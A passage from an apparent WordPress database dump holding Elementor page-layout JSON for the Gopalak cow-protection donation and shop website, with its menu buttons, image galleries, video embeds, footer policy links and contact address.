Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ec00ae\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58263a0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1fe19cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a8042dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"41de25e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e80cac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ab4d180\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e6c805\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"06b93d5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e4cd210\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"351619a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11849,1965,'_elementor_page_assets','a:0:{}'),(11855,1967,'_elementor_edit_mode','builder'),(11856,1967,'_elementor_template_type','wp-page'),(11857,1967,'_elementor_version','3.7.8'),(11858,1967,'_wp_page_template','elementor_canvas'),(11859,1967,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy 